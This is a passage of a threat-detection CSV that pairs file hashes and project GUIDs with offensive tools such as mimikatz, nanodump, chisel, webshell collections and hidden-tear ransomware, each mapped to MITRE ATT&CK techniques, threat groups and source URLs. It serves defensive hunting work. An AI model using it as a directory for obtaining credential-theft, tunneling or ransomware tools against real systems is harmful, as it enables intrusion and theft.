- T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29400"
"*798f7f112a49afffac6f7290e24812e6a473d10b7bbb8dca9f32e5af074abaf1*",".{0,1000}798f7f112a49afffac6f7290e24812e6a473d10b7bbb8dca9f32e5af074abaf1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29401"
"*7992bdccdeafe04123c097c807381ea987d778b6c8d527937f3eb9146ae39a54*",".{0,1000}7992bdccdeafe04123c097c807381ea987d778b6c8d527937f3eb9146ae39a54.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29402"
"*79a0b0ac70e2c7315bd2a6e100737159b71da490aad293d6583e995a6a7244aa*",".{0,1000}79a0b0ac70e2c7315bd2a6e100737159b71da490aad293d6583e995a6a7244aa.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29403"
"*79acacd2433990d8fe71ee9583123240b34ae26f4913d62b796238f4a302e104*",".{0,1000}79acacd2433990d8fe71ee9583123240b34ae26f4913d62b796238f4a302e104.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","#filehash","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","29404"
"*79ba1aa3b1b83aeb4db3fcf649b4acffce02a559a39b10905b4eb6676a646538*",".{0,1000}79ba1aa3b1b83aeb4db3fcf649b4acffce02a559a39b10905b4eb6676a646538.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#filehash","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","29409"
"*79c1d4ab8f425095d2d9f2a18a0cab08d31b686b149fba3db24a13e2bc7299ee*",".{0,1000}79c1d4ab8f425095d2d9f2a18a0cab08d31b686b149fba3db24a13e2bc7299ee.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","29410"
"*79c64d376c00d7ccc3d946771a009fdcc9da4f066c9457805a19d1f804597466*",".{0,1000}79c64d376c00d7ccc3d946771a009fdcc9da4f066c9457805a19d1f804597466.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","29411"
"*79C9BBA3-A0EA-431C-866C-77004802D8A0*",".{0,1000}79C9BBA3\-A0EA\-431C\-866C\-77004802D8A0.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#GUIDproject","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","29413"
"*79C9BBA3-A0EA-431C-866C-77004802D8A0*",".{0,1000}79C9BBA3\-A0EA\-431C\-866C\-77004802D8A0.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","29414"
"*79d297c97d9217e752410cfcc43ca6eb8b67755bc396d37ae4fe7c2348413bba*",".{0,1000}79d297c97d9217e752410cfcc43ca6eb8b67755bc396d37ae4fe7c2348413bba.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29415"
"*79D3788D-683D-4799-94B7-00360F08145B*",".{0,1000}79D3788D\-683D\-4799\-94B7\-00360F08145B.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","29416"
"*79d864217d3db0f218b2a638648d1a86b5b6ef2d4fab9d09cd50460685f1a2a7*",".{0,1000}79d864217d3db0f218b2a638648d1a86b5b6ef2d4fab9d09cd50460685f1a2a7.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","29418"
"*79e31f821d147c4db713a2a7381810a2588105f592e22d21872b38be0b0aa758*",".{0,1000}79e31f821d147c4db713a2a7381810a2588105f592e22d21872b38be0b0aa758.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29419"
"*79e94689174f714187930b4003d27a11e7824508e295849ddda8dd94adbf994c*",".{0,1000}79e94689174f714187930b4003d27a11e7824508e295849ddda8dd94adbf994c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29420"
"*79ef2d4f2ad91311f14fc200acb71e78a47eb9a4f23e776649fb1b0b06c69dd2*",".{0,1000}79ef2d4f2ad91311f14fc200acb71e78a47eb9a4f23e776649fb1b0b06c69dd2.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","29421"
"*79efd1cb38bfa9ea0c22059d17bc11498bf0f181d5dba1726fa526a500865ec8*",".{0,1000}79efd1cb38bfa9ea0c22059d17bc11498bf0f181d5dba1726fa526a500865ec8.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29422"
"*79f190a51af8a463f13ddd5a76947cf7ba2adfb8e231b37c5e0968602217a62b*",".{0,1000}79f190a51af8a463f13ddd5a76947cf7ba2adfb8e231b37c5e0968602217a62b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29423"
"*79f30574ad34a49673425cb37cd038106cc9fb49615cd6a2d05986e0c7c010e2*",".{0,1000}79f30574ad34a49673425cb37cd038106cc9fb49615cd6a2d05986e0c7c010e2.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","29424"
"*79f4a5f47346781f2b5d7ffbf570db04e0410c435b5bf993ce4e3e3bfbc6e850*",".{0,1000}79f4a5f47346781f2b5d7ffbf570db04e0410c435b5bf993ce4e3e3bfbc6e850.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29426"
"*79F54747-048D-4FD6-AEF4-7B098F923FD8*",".{0,1000}79F54747\-048D\-4FD6\-AEF4\-7B098F923FD8.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","#GUIDproject","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","29427"
"*79f5bb07a32da20893b7d1755cee8b5f8f637d5712eac1788b796eda90e75de2*",".{0,1000}79f5bb07a32da20893b7d1755cee8b5f8f637d5712eac1788b796eda90e75de2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29428"
"*79f9d6b67d810d18cc0bd093578cb11d26ce43801eb6aedb2933336380ed6452*",".{0,1000}79f9d6b67d810d18cc0bd093578cb11d26ce43801eb6aedb2933336380ed6452.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29430"
"*7a0abdd123fe8f650f37557666688ee7c050c94d8271462de50b5cb1e9b58246*",".{0,1000}7a0abdd123fe8f650f37557666688ee7c050c94d8271462de50b5cb1e9b58246.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","29432"
"*7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1*",".{0,1000}7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29433"
"*7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1*",".{0,1000}7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29434"
"*7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1*",".{0,1000}7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29435"
"*7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1*",".{0,1000}7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29436"
"*7a0ea2754fa07652dcd87ccba97c9e43ecdc035dc2d3f94e148fea04b6bdea0a*",".{0,1000}7a0ea2754fa07652dcd87ccba97c9e43ecdc035dc2d3f94e148fea04b6bdea0a.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","29439"
"*7a1090e46befa253c4f1cf0d595e3718fce05aad37b08107aa02f0d40de3347f*",".{0,1000}7a1090e46befa253c4f1cf0d595e3718fce05aad37b08107aa02f0d40de3347f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29440"
"*7a1d50f5e8827f2b2f920811f966be5358f0a24fa52301852b32ba94146a7be6*",".{0,1000}7a1d50f5e8827f2b2f920811f966be5358f0a24fa52301852b32ba94146a7be6.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","29441"
"*7a27b58586f2af0303a70ac17220e57202a85648679466cb9bbd23517bfa4d1f*",".{0,1000}7a27b58586f2af0303a70ac17220e57202a85648679466cb9bbd23517bfa4d1f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29442"
"*7a2fb0b27e7c44f2a37ad254df79b3677b010d34bf6421281a2a37c1088d613f*",".{0,1000}7a2fb0b27e7c44f2a37ad254df79b3677b010d34bf6421281a2a37c1088d613f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","29444"
"*7a32219b9b7ba4fca2fd03d0f2387245b9f3049521b9076a5ab4a21f57bb977f*",".{0,1000}7a32219b9b7ba4fca2fd03d0f2387245b9f3049521b9076a5ab4a21f57bb977f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29445"
"*7a322867ddea562c2a6a1cb9485992f3cec84f2cbf8814261f0cb604bad3958f*",".{0,1000}7a322867ddea562c2a6a1cb9485992f3cec84f2cbf8814261f0cb604bad3958f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29446"
"*7a324791d74e0a99c63686f9e2cd5be616286fbd19b74f780de251e3d8ab87a7*",".{0,1000}7a324791d74e0a99c63686f9e2cd5be616286fbd19b74f780de251e3d8ab87a7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29447"
"*7a3a00796caebdd1e5d80cc330ea232e62fecefc264492892c3ff93f15c977a2*",".{0,1000}7a3a00796caebdd1e5d80cc330ea232e62fecefc264492892c3ff93f15c977a2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29448"
"*7a3a00796caebdd1e5d80cc330ea232e62fecefc264492892c3ff93f15c977a2*",".{0,1000}7a3a00796caebdd1e5d80cc330ea232e62fecefc264492892c3ff93f15c977a2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29449"
"*7a3a2f28dde73ea7c3b19c7e4552185b9ff0417b2bcc8c5daaf4d14952559fbc*",".{0,1000}7a3a2f28dde73ea7c3b19c7e4552185b9ff0417b2bcc8c5daaf4d14952559fbc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29450"
"*7a40166148f77773238e3e5ad7572068d0b935303278f007c6c75dd3e9e302b3*",".{0,1000}7a40166148f77773238e3e5ad7572068d0b935303278f007c6c75dd3e9e302b3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29452"
"*7a4f5e4e4a422a58994593c27fc6e9772072ad573ff22483f1b6913f9bbe70ad*",".{0,1000}7a4f5e4e4a422a58994593c27fc6e9772072ad573ff22483f1b6913f9bbe70ad.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29454"
"*7a4f600a398bfaf6e212a43d8a41a279a97b84b15308b7db0ffd2f54b9c117f7*",".{0,1000}7a4f600a398bfaf6e212a43d8a41a279a97b84b15308b7db0ffd2f54b9c117f7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29455"
"*7a51b5ea288d01fbe7563ef86cf5ece3f04a37b6d1754192f69f19dbad570678*",".{0,1000}7a51b5ea288d01fbe7563ef86cf5ece3f04a37b6d1754192f69f19dbad570678.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29456"
"*7a51ed902fc804066c4617af21d0325cceebce588ca66709c697916ce5214e64*",".{0,1000}7a51ed902fc804066c4617af21d0325cceebce588ca66709c697916ce5214e64.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","29457"
"*7a5234a69f2e2f43bf8f67c2b738e50db29a18014be4e131234a19c98e0302b4*",".{0,1000}7a5234a69f2e2f43bf8f67c2b738e50db29a18014be4e131234a19c98e0302b4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29458"
"*7A58EE54-7F2E-4C2F-B41E-19DD0D1629F1*",".{0,1000}7A58EE54\-7F2E\-4C2F\-B41E\-19DD0D1629F1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29461"
